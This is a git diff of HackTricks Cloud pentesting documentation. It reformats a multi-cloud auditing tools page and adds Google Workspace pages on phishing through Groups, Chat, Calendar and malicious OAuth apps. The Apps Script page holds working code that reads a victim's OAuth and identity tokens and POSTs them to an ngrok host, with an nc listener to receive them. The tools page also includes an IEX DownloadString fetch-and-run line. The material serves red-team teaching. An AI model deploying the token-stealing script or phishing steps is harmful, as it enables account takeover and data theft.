 
 ## Multi-Cloud tools
@@ -53,8 +40,9 @@ There are several tools that can be used to test different cloud environments. T
 
 A tool to **identify bad configurations and privesc path in clouds and across clouds/SaaS.**
 
-{% tabs %}
-{% tab title="Install" %}
+{{#tabs }}
+{{#tab name="Install" }}
+
 ```bash
 # You need to install and run neo4j also
 git clone https://github.com/carlospolop/PurplePanda
@@ -66,9 +54,11 @@ export PURPLEPANDA_NEO4J_URL="bolt://neo4j@localhost:7687"
 export PURPLEPANDA_PWD="neo4j_pwd_4_purplepanda"
 python3 main.py -h # Get help
 ```
-{% endtab %}
 
-{% tab title="GCP" %}
+{{#endtab }}
+
+{{#tab name="GCP" }}
+
 ```bash
 export GOOGLE_DISCOVERY=$(echo 'google:
 - file_path: ""
@@ -79,8 +69,9 @@ export GOOGLE_DISCOVERY=$(echo 'google:
 python3 main.py -a -p google #Get basic info of the account to check it's correctly configured
 python3 main.py -e -p google #Enumerate the env
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### [Prowler](https://github.com/prowler-cloud/prowler)
 
@@ -105,8 +96,9 @@ prowler  --list-services
 
 AWS, Azure, Github, Google, Oracle, Alibaba
 
-{% tabs %}
-{% tab title="Install" %}
+{{#tabs }}
+{{#tab name="Install" }}
+
 ```bash
 # Install
 git clone https://github.com/aquasecurity/cloudsploit.git
@@ -115,22 +107,26 @@ npm install
 ./index.js -h
 ## Docker instructions in github
 ```
-{% endtab %}
 
-{% tab title="GCP" %}
+{{#endtab }}
+
+{{#tab name="GCP" }}
+
 ```bash
 ## You need to have creds for a service account and set them in config.js file
 ./index.js --cloud google --config 
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### [ScoutSuite](https://github.com/nccgroup/ScoutSuite)
 
 AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
 
-{% tabs %}
-{% tab title="Install" %}
+{{#tabs }}
+{{#tab name="Install" }}
+
 ```bash
 mkdir scout; cd scout
 virtualenv -p python3 venv
@@ -139,9 +135,11 @@ pip install scoutsuite
 scout --help
 ## Using Docker: https://github.com/nccgroup/ScoutSuite/wiki/Docker-Image
 ```
-{% endtab %}
 
-{% tab title="GCP" %}
+{{#endtab }}
+
+{{#tab name="GCP" }}
+
 ```bash
 scout gcp --report-dir /tmp/gcp --user-account --all-projects
 ## use "--service-account KEY_FILE" instead of "--user-account" to use a service account
@@ -154,22 +152,25 @@ for pid in $(gcloud projects list --format="value(projectId)"); do
     scout gcp --report-dir "$SCOUT_FOLDER_REPORT/$pid" --no-browser --user-account --project-id "$pid"
 done
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### [Steampipe](https://github.com/turbot)
 
-{% tabs %}
-{% tab title="Install" %}
+{{#tabs }}
+{{#tab name="Install" }}
 Download and install Steampipe ([https://steampipe.io/downloads](https://steampipe.io/downloads)). Or use Brew:
 
 ```
 brew tap turbot/tap
 brew install steampipe
 ```
-{% endtab %}
 
-{% tab title="GCP" %}
+{{#endtab }}
+
+{{#tab name="GCP" }}
+
 ```bash
 # Install gcp plugin
 steampipe plugin install gcp
@@ -203,7 +204,7 @@ done
 
 # Generate the aggragator to call
 echo 'connection "gcp_all" {
-  plugin      = "gcp" 
+  plugin      = "gcp"
   type        = "aggregator"
   connections = ["gcp_*"]
 }' >> "$FILEPATH"
@@ -218,9 +219,10 @@ To check **other GCP insights** (useful for enumerating services) use: [https://
 To check Terraform GCP code: [https://github.com/turbot/steampipe-mod-terraform-gcp-compliance](https://github.com/turbot/steampipe-mod-terraform-gcp-compliance)
 
 More GCP plugins of Steampipe: [https://github.com/turbot?q=gcp](https://github.com/turbot?q=gcp)
-{% endtab %}
+{{#endtab }}
+
+{{#tab name="AWS" }}
 
-{% tab title="AWS" %}
 ```bash
 # Install aws plugin
 steampipe plugin install aws
@@ -248,8 +250,8 @@ steampipe check all --export=/tmp/output4.json
 To check Terraform AWS code: [https://github.com/turbot/steampipe-mod-terraform-aws-compliance](https://github.com/turbot/steampipe-mod-terraform-aws-compliance)
 
 More AWS plugins of Steampipe: [https://github.com/orgs/turbot/repositories?q=aws](https://github.com/orgs/turbot/repositories?q=aws)
-{% endtab %}
-{% endtabs %}
+{{#endtab }}
+{{#endtabs }}
 
 ### [~~cs-suite~~](https://github.com/SecurityFTW/cs-suite)
 
@@ -264,8 +266,9 @@ Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Offi
 
 Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers.
 
-{% tabs %}
-{% tab title="Cloudlist" %}
+{{#tabs }}
+{{#tab name="Cloudlist" }}
+
 ```bash
 cd /tmp
 wget https://github.com/projectdiscovery/cloudlist/releases/latest/download/cloudlist_1.0.1_macOS_arm64.zip
@@ -273,31 +276,37 @@ unzip cloudlist_1.0.1_macOS_arm64.zip
 chmod +x cloudlist
 sudo mv cloudlist /usr/local/bin
 ```
-{% endtab %}
 
-{% tab title="Second Tab" %}
+{{#endtab }}
+
+{{#tab name="Second Tab" }}
+
 ```bash
 ## For GCP it requires service account JSON credentials
 cloudlist -config 
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### [**cartography**](https://github.com/lyft/cartography)
 
 Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
 
-{% tabs %}
-{% tab title="Install" %}
+{{#tabs }}
+{{#tab name="Install" }}
+
 ```bash
 # Installation
 docker image pull ghcr.io/lyft/cartography
 docker run --platform linux/amd64 ghcr.io/lyft/cartography cartography --help
 ## Install a Neo4j DB version 3.5.*
 ```
-{% endtab %}
 
-{% tab title="GCP" %}
+{{#endtab }}
+
+{{#tab name="GCP" }}
+
 ```bash
 docker run --platform linux/amd64 \
      --volume "$HOME/.config/gcloud/application_default_credentials.json:/application_default_credentials.json" \
@@ -317,15 +326,17 @@ docker run --platform linux/amd64 \
 ## Google Kubernetes Engine
 ### If you can run starbase or purplepanda you will get more info
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### [**starbase**](https://github.com/JupiterOne/starbase)
 
 Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
 
-{% tabs %}
-{% tab title="Install" %}
+{{#tabs }}
+{{#tab name="Install" }}
+
 ```bash
 # You are going to need Node version 14, so install nvm following https://tecadmin.net/install-nvm-macos-with-homebrew/
 npm install --global yarn
@@ -348,22 +359,23 @@ docker build --no-cache -t starbase:latest .
 docker-compose run starbase setup
 docker-compose run starbase run
 ```
-{% endtab %}
 
-{% tab title="GCP" %}
+{{#endtab }}
+
+{{#tab name="GCP" }}
+
 ```yaml
 ## Config for GCP
 ### Check out: https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md
 ### It requires service account credentials
- 
+
 integrations:
-  -
-    name: graph-google-cloud
+  - name: graph-google-cloud
     instanceId: testInstanceId
     directory: ./.integrations/graph-google-cloud
     gitRemoteUrl: https://github.com/JupiterOne/graph-google-cloud.git
     config:
-      SERVICE_ACCOUNT_KEY_FILE: '{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}'
+      SERVICE_ACCOUNT_KEY_FILE: "{Check https://github.com/JupiterOne/graph-google-cloud/blob/main/docs/development.md#service_account_key_file-string}"
       PROJECT_ID: ""
       FOLDER_ID: ""
       ORGANIZATION_ID: ""
@@ -371,14 +383,15 @@ integrations:
 
 storage:
   engine: neo4j
-  config: 
+  config:
     username: neo4j
     password: s3cr3t
     uri: bolt://localhost:7687
     #Consider using host.docker.internal if from docker
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### [**SkyArk**](https://github.com/cyberark/SkyArk)
 
@@ -389,8 +402,8 @@ Import-Module .\SkyArk.ps1 -force
 Start-AzureStealth
 
 # in the Cloud Console
-IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')  
-Scan-AzureAdmins  
+IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
+Scan-AzureAdmins
 ```
 
 ### [Cloud Brute](https://github.com/0xsha/CloudBrute)
@@ -399,39 +412,39 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
 
 ### [CloudFox](https://github.com/BishopFox/cloudfox)
 
-* CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
-* It is an enumeration tool which is intended to compliment manual pentesting.
-* It doesn't create or modify any data within the cloud environment.
+- CloudFox is a tool to find exploitable attack paths in cloud infrastructure (currently only AWS & Azure supported with GCP upcoming).
+- It is an enumeration tool which is intended to compliment manual pentesting.
+- It doesn't create or modify any data within the cloud environment.
 
 ### More lists of cloud security tools
 
-* [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
+- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
 
 ## Google
 
 ### GCP
 
-{% content-ref url="gcp-security/" %}
-[gcp-security](gcp-security/)
-{% endcontent-ref %}
+{{#ref}}
+gcp-security/
+{{#endref}}
 
 ### Workspace
 
-{% content-ref url="workspace-security/" %}
-[workspace-security](workspace-security/)
-{% endcontent-ref %}
+{{#ref}}
+workspace-security/
+{{#endref}}
 
 ## AWS
 
-{% content-ref url="aws-security/" %}
-[aws-security](aws-security/)
-{% endcontent-ref %}
+{{#ref}}
+aws-security/
+{{#endref}}
 
 ## Azure
 
-{% content-ref url="azure-security/" %}
-[azure-security](azure-security/)
-{% endcontent-ref %}
+{{#ref}}
+azure-security/
+{{#endref}}
 
 ### Attack Graph
 
@@ -441,17 +454,4 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
 
 You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**.
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/workspace-security/README.md b/src/pentesting-cloud/workspace-security/README.md
new file mode 100644
index 000000000..089b8f164
--- /dev/null
+++ b/src/pentesting-cloud/workspace-security/README.md
@@ -0,0 +1,73 @@
+# GWS - Workspace Pentesting
+
+{{#include ../../banners/hacktricks-training.md}}
+
+## Entry Points
+
+### Google Platforms and OAuth Apps Phishing
+
+Check how you could use different Google platforms such as Drive, Chat, Groups... to send the victim a phishing link and how to perform a Google OAuth Phishing in:
+
+{{#ref}}
+gws-google-platforms-phishing/
+{{#endref}}
+
+### Password Spraying
+
+In order to test passwords with all the emails you found (or you have generated based in a email name pattern you might have discover) you could use a tool like [**https://github.com/ustayready/CredKing**](https://github.com/ustayready/CredKing) (although it looks unmaintained) which will use AWS lambdas to change IP address.
+
+## Post-Exploitation
+
+If you have compromised some credentials or the session of the user you can perform several actions to access potential sensitive information of the user and to try to escala privileges:
+
+{{#ref}}
+gws-post-exploitation.md
+{{#endref}}
+
+### GWS <-->GCP Pivoting
+
+Read more about the different techniques to pivot between GWS and GCP in:
+
+{{#ref}}
+../gcp-security/gcp-to-workspace-pivoting/
+{{#endref}}
+
+## GWS <--> GCPW | GCDS | Directory Sync (AD & EntraID)
+
+- **GCPW (Google Credential Provider for Windows)**: This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will **store tokens to access Google Workspace** in some places in the PC.
+- **GCDS (Google CLoud DIrectory Sync)**: This is a tool that can be used to **sync your active directory users and groups to your Workspace**. The tool requires the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
+- **Admin Directory Sync**: It allows you to synchronize users from AD and EntraID in a serverless process from [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
+
+{{#ref}}
+gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/
+{{#endref}}
+
+## Persistence
+
+If you have compromised some credentials or the session of the user check these options to maintain persistence over it:
+
+{{#ref}}
+gws-persistence.md
+{{#endref}}
+
+## Account Compromised Recovery
+
+- Log out of all sessions
+- Change user password
+- Generate new 2FA backup codes
+- Remove App passwords
+- Remove OAuth apps
+- Remove 2FA devices
+- Remove email forwarders
+- Remove emails filters
+- Remove recovery email/phones
+- Removed malicious synced smartphones
+- Remove bad Android Apps
+- Remove bad account delegations
+
+## References
+
+- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
similarity index 56%
rename from pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
rename to src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
index 29201100e..7877374d9 100644
--- a/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
+++ b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md
@@ -1,23 +1,12 @@
 # GWS - Google Platforms Phishing
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Generic Phishing Methodology
 
-{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology" %}
+{{#ref}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology
+{{#endref}}
 
 ## Google Groups Phishing
 
@@ -25,30 +14,28 @@ Apparently, by default, in workspace members [**can create groups**](https://gro
 
 It's also possible to set the **FROM** address as the **Google group email** to send **more emails to the users inside the group**, like in the following image where the group **`google--support@googlegroups.com`** was created and an **email was sent to all the members** of the group (that were added without any consent)
 
-

+

 
 ## Google Chat Phishing
 
 You might be able to either **start a chat** with a person just having their email address or send an **invitation to talk**. Moreover, it's possible to **create a Space** that can have any name (e.g. "Google Support") and **invite** members to it. If they accept they might think that they are talking to Google Support:
 
-

+

 
-{% hint style="success" %}
-**In my testing however the invited members didn't even receive an invitation.**
-{% endhint %}
+> [!TIP]
+> **In my testing however the invited members didn't even receive an invitation.**
 
-You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s)
+You can check how this worked in the past in: [https://www.youtube.com/watch?v=KTVHLolz6cE\&t=904s](https://www.youtube.com/watch?v=KTVHLolz6cE&t=904s)
 
 ## Google Doc Phishing
 
 In the past it was possible to create an **apparently legitimate document** and the in a comment **mention some email (like @user@gmail.com)**. Google **sent an email to that email address** notifying that they were mentioned in the document.\
 Nowadays, this doesn't work but if you **give the victim email access to the document** Google will send an email indicating so. This is the message that appears when you mention someone:
 
-

+

 
-{% hint style="success" %}
-Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
-{% endhint %}
+> [!TIP]
+> Victims might have protection mechanism that doesn't allow that emails indicating that an external document was shared with them reach their email.
 
 ## Google Calendar Phishing
 
@@ -56,51 +43,48 @@ You can **create a calendar event** and add as many email address of the company
 
 This is the alert that will appear in the browser with a meeting title "Firing People", so you could set a more phishing like title (and even change the name associated with your email).
 
-

+

 
 To make it look less suspicious:
 
-* Set it up so that **receivers cannot see the other people invited**
-* Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
-* Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
+- Set it up so that **receivers cannot see the other people invited**
+- Do **NOT send emails notifying about the event**. Then, the people will only see their warning about a meeting in 5mins and that they need to read that link.
+- Apparently using the API you can set to **True** that **people** have **accepted** the event and even create **comments on their behalf**.
 
 ## App Scripts Redirect Phishing
 
 It's possible to create a script in [https://script.google.com/](https://script.google.com/) and **expose it as a web application accessible by everyone** that will use the legit domain **`script.google.com`**.\
 The with some code like the following an attacker could make the script load arbitrary content in this page without stop accessing the domain:
 
-{% code overflow="wrap" %}
 ```javascript
 function doGet() {
-  return HtmlService.createHtmlOutput('')
-        .setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL);
+  return HtmlService.createHtmlOutput(
+    ''
+  ).setXFrameOptionsMode(HtmlService.XFrameOptionsMode.ALLOWALL)
 }
 ```
-{% endcode %}
 
-For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH\_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
+For example accessing [https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec](https://script.google.com/macros/s/AKfycbwuLlzo0PUaT63G33MtE6TbGUNmTKXCK12o59RKC7WLkgBTyltaS3gYuH_ZscKQTJDC/exec) you will see:
 
-

+

 
-{% hint style="success" %}
-Note that a warning will appear as the content is loaded inside an iframe.
-{% endhint %}
+> [!TIP]
+> Note that a warning will appear as the content is loaded inside an iframe.
 
 ## App Scripts OAuth Phishing
 
 It's possible to create App Scripts attached to documents to try to get access over a victims OAuth token, for more information check:
 
-{% content-ref url="gws-app-scripts.md" %}
-[gws-app-scripts.md](gws-app-scripts.md)
-{% endcontent-ref %}
+{{#ref}}
+gws-app-scripts.md
+{{#endref}}
 
 ## OAuth Apps Phishing
 
 Any of the previous techniques might be used to make the user access a **Google OAuth application** that will **request** the user some **access**. If the user **trusts** the **source** he might **trust** the **application** (even if it's asking for high privileged permissions).
 
-{% hint style="info" %}
-Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
-{% endhint %}
+> [!NOTE]
+> Note that Google presents an ugly prompt asking warning that the application is untrusted in several cases and Workspace admins can even prevent people accepting OAuth applications.
 
 **Google** allows to create applications that can **interact on behalf users** with several **Google services**: Gmail, Drive, GCP...
 
@@ -115,15 +99,15 @@ As it was mentioned, google will always present a **prompt to the user to accept
 
 This prompt appears in apps that:
 
-* Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
-* Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
+- Use any scope that can access private data (Gmail, Drive, GCP, BigQuery...)
+- Apps with less than 100 users (apps > 100 a review process is also needed to stop showing the unverified prompt)
 
 ### Interesting Scopes
 
 [**Here**](https://developers.google.com/identity/protocols/oauth2/scopes) you can find a list of all the Google OAuth scopes.
 
-* **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
-* **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
+- **cloud-platform**: View and manage your data across **Google Cloud Platform** services. You can impersonate the user in GCP.
+- **admin.directory.user.readonly**: See and download your organization's GSuite directory. Get names, phones, calendar URLs of all the users.
 
 ### Create an OAuth App
 
@@ -131,11 +115,11 @@ This prompt appears in apps that:
 
 1. Go to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient) and click on configure the consent screen.
 2. Then, you will be asked if the **user type** is **internal** (only for people in your org) or **external**. Select the one that suits your needs
-   * Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
+   - Internal might be interesting you have already compromised a user of the organization and you are creating this App to phish another one.
 3. Give a **name** to the app, a **support email** (note that you can set a googlegroup email to try to anonymize yourself a bit more), a **logo**, **authorized domains** and another **email** for **updates**.
 4. **Select** the **OAuth scopes**.
-   * This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
-   * Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
+   - This page is divided in non sensitive permissions, sensitive permissions and restricted permissions. Eveytime you add a new permisison it's added on its category. Depending on the requested permissions different prompt will appear to the user indicating how sensitive these permissions are.
+   - Both **`admin.directory.user.readonly`** and **`cloud-platform`** are sensitive permissions.
 5. **Add the test users.** As long as the status of the app is testing, only these users are going to be able to access the app so make sure to **add the email you are going to be phishing**.
 
 Now let's get **credentials for a web application** using the **previously created OAuth Client ID**:
@@ -143,10 +127,10 @@ Now let's get **credentials for a web application** using the **previously creat
 1. Go back to [https://console.cloud.google.com/apis/credentials/oauthclient](https://console.cloud.google.com/apis/credentials/oauthclient), a different option will appear this time.
 2. Select to **create credentials for a Web application**
 3. Set needed **Javascript origins** and **redirect URIs**
-   * You can set in both something like **`http://localhost:8000/callback`** for testing
+   - You can set in both something like **`http://localhost:8000/callback`** for testing
 4. Get your application **credentials**
 
-Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp\_oauth\_phishing\_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
+Finally, lets **run a web application that will use the OAuth application credentials**. You can find an example in [https://github.com/carlospolop/gcp_oauth_phishing_example](https://github.com/carlospolop/gcp_oauth_phishing_example).
 
 ```bash
 git clone ttps://github.com/carlospolop/gcp_oauth_phishing_example
@@ -157,38 +141,25 @@ python3 app.py --client-id "" --client-secret ""
 
 Go to **`http://localhost:8000`** click on the Login with Google button, you will be **prompted** with a message like this one:
 
-

+

 
 The application will show the **access and refresh token** than can be easily used. For more information about **how to use these tokens check**:
 
-{% content-ref url="../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md" %}
-[gcp-non-svc-persistance.md](../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-security/gcp-persistence/gcp-non-svc-persistance.md
+{{#endref}}
 
 #### Using `glcoud`
 
 It's possible to do something using gcloud instead of the web console, check:
 
-{% content-ref url="../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md" %}
-[gcp-clientauthconfig-privesc.md](../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md
+{{#endref}}
 
 ## References
 
-* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
-* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
new file mode 100644
index 000000000..f51006208
--- /dev/null
+++ b/src/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md
@@ -0,0 +1,235 @@
+# GWS - App Scripts
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## App Scripts
+
+App Scripts is **code that will be triggered when a user with editor permission access the doc the App Script is linked with** and after **accepting the OAuth prompt**.\
+They can also be set to be **executed every certain time** by the owner of the App Script (Persistence).
+
+### Create App Script
+
+There are several ways to create an App Script, although the most common ones are f**rom a Google Document (of any type)** and as a **standalone project**:
+
+

+
+Create a container-bound project from Google Docs, Sheets, or Slides
+
+1. Open a Docs document, a Sheets spreadsheet, or Slides presentation.
+2. Click **Extensions** > **Google Apps Script**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+

+
+

+
+Create a standalone project
+
+To create a standalone project from Apps Script:
+
+1. Go to [`script.google.com`](https://script.google.com/).
+2. Click add **New Project**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+

+
+

+
+Create a standalone project from Google Drive
+
+1. Open [Google Drive](https://drive.google.com/).
+2. Click **New** > **More** > **Google Apps Script**.
+
+

+
+

+
+Create a container-bound project from Google Forms
+
+1. Open a form in Google Forms.
+2. Click More more_vert > **Script editor**.
+3. In the script editor, click **Untitled project**.
+4. Give your project a name and click **Rename**.
+
+

+
+

+
+Create a standalone project using the clasp command line tool
+
+`clasp` is a command line tool that allows you create, pull/push, and deploy Apps Script projects from a terminal.
+
+See the [Command Line Interface using `clasp` guide](https://developers.google.com/apps-script/guides/clasp) for more details.
+
+

+
+## App Script Scenario 
+
+### Create Google Sheet with App Script
+
+Start by crating an App Script, my recommendation for this scenario is to create a Google Sheet and go to **`Extensions > App Scripts`**, this will open a **new App Script for you linked to the sheet**.
+
+### Leak token
+
+In order to give access to the OAuth token you need to click on **`Services +` and add scopes like**:
+
+- **AdminDirectory**: Access users and groups of the directory (if the user has enough permissions)
+- **Gmail**: To access gmail data
+- **Drive**: To access drive data
+- **Google Sheets API**: So it works with the trigger
+
+To change yourself the **needed scopes** you can go to project settings and enable: **`Show "appsscript.json" manifest file in editor`.**
+
+```javascript
+function getToken() {
+  var userEmail = Session.getActiveUser().getEmail()
+  var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1)
+  var oauthToken = ScriptApp.getOAuthToken()
+  var identityToken = ScriptApp.getIdentityToken()
+
+  // Data json
+  data = {
+    oauthToken: oauthToken,
+    identityToken: identityToken,
+    email: userEmail,
+    domain: domain,
+  }
+
+  // Send data
+  makePostRequest(data)
+
+  // Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions
+
+  // To ask for AdminDirectory permissions
+  var pageToken = ""
+  page = AdminDirectory.Users.list({
+    domain: domain, // Use the extracted domain
+    orderBy: "givenName",
+    maxResults: 100,
+    pageToken: pageToken,
+  })
+
+  // To ask for gmail permissions
+  var threads = GmailApp.getInboxThreads(0, 10)
+
+  // To ask for drive permissions
+  var files = DriveApp.getFiles()
+}
+
+function makePostRequest(data) {
+  var url = "http://5.tcp.eu.ngrok.io:12027"
+
+  var options = {
+    method: "post",
+    contentType: "application/json",
+    payload: JSON.stringify(data),
+  }
+
+  try {
+    UrlFetchApp.fetch(url, options)
+  } catch (e) {
+    Logger.log("Error making POST request: " + e.toString())
+  }
+}
+```
+
+To capture the request you can just run:
+
+```bash
+ngrok tcp 4444
+nc -lv 4444 #macOS
+```
+
+Permissions requested to execute the App Script:
+
+

+
+> [!WARNING]
+> As an external request is made the OAuth prompt will also **ask to permission to reach external endpoints**.
+
+### Create Trigger
+
